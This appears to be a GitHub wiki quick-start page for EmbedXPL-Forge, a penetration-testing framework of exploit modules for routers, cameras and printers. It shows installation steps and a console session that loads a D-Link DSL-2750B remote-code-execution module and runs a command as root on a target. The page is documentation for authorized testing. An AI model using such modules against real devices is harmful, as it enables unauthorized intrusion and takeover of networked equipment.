Skip to content

Quick Start

Jump to bottom
André Henrique edited this page Jun 8, 2026 · 2 revisions

Quick Start

Installation

From PyPI (recommended)

pip install embedxpl

From source

git clone https://github.com/mrhenrike/EmbedXPL-Forge.git
cd EmbedXPL-Forge
pip install -e .

Verify installation

embedxpl --version
EmbedXPL-Forge v3.2.0 - Embedded Device Security Assessment Framework
Python 3.11.9 | BSD-3-Clause | github.com/mrhenrike/EmbedXPL-Forge

First Run

embedxpl
         ______          _              _  __   ____  _
        |  ____|        | |            | | \ \ / /  \| |
        | |__  _ __ ___ | |__   ___  __| |  \ V / .` |
        |  __|| '_ ` _ \| '_ \ / _ \/ _` |   > <| |  |
        | |___| | | | | | |_) |  __/ (_| |  / ^ \ |_| |
        |_____|_| |_| |_|_.__/ \___|\__,_| /_/ \_\____/

    Embedded & Perimeter Security Assessment Framework v3.2.0
    3000+ modules | 700+ CVEs | 114+ vendors

exf >

Basic Workflow

1. List available modules

exf > show modules
Exploit Modules:
  exploits/routers/asus                    (14 modules)
  exploits/routers/dlink                   (31 modules)
  exploits/routers/netgear                 (18 modules)
  exploits/cameras/hikvision               (22 modules)
  exploits/cameras/dahua                   (19 modules)
  exploits/printers/hp                     (24 modules)
  ...

exf > show modules type=scanners

2. Search for a specific target

exf > search dlink
[*] Searching for: dlink
Modules found (47):
  exploits/routers/dlink/dir_300_615_rce
  exploits/routers/dlink/dsl_2750b_rce
  exploits/cameras/dlink/dcs_932l_auth_bypass
  exploits/cameras/dlink/dcs_932l_light_sensor_rce_cve_2026_36983
  ...

3. Load and run a module

exf > use exploits/routers/dlink/dsl_2750b_rce
exf (DSL2750B RCE) > show options

Module: DSL2750B RCE
  Name:     D-Link DSL-2750B Remote Code Execution
  CVE:      CVE-2016-20017
  CVSS:     9.8 (Critical)
  Target:   D-Link DSL-2750B, DSL-2750E, related models

Options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.1.1      yes       Target IP address
  RPORT    80               yes       HTTP port
  CMD      id               yes       Command to execute
  TIMEOUT  10               no        Connection timeout

exf (DSL2750B RCE) > set RHOST 192.168.1.1
RHOST => 192.168.1.1

exf (DSL2750B RCE) > check
[*] Checking 192.168.1.1:80...
[+] Target appears vulnerable (DSL-2750B firmware < 1.08)

exf (DSL2750B RCE) > run
[*] Running against 192.168.1.1:80
[+] Command executed: id
[+] Output: uid=0(root) gid=0(root) groups=0(root)
[+] RCE confirmed - target is compromised

Best Practices

Always obtain written authorization before testing any device you do not own. This framework is for authorized security research and penetration testing only.

  • Start with check before run to avoid unnecessary noise
  • Use simulate=true for modules that support it (destructive operations)
  • Log sessions: exf > set LOGLEVEL debug
  • Set a responsible timeout: exf > set TIMEOUT 10

Home | CLI Reference

EmbedXPL-Forge v3.2.1 | GitHub | PyPI | Issues

pip install embedxpl | pip install firewallxpl | pip install printerxpl-forge | pip install wirelessxpl | pip install mikrotikapi-bf

EmbedXPL-Forge v3.4.0

Home | Home-pt-BR

English (en-US)

Getting Started

Modules

Shell & Post-Exploitation

Tools & Infrastructure

Reference

Portugues (pt-BR)

Comecar

Modulos

Shell e Pos-Exploracao

Ferramentas e Infraestrutura

Referencia

Clone this wiki locally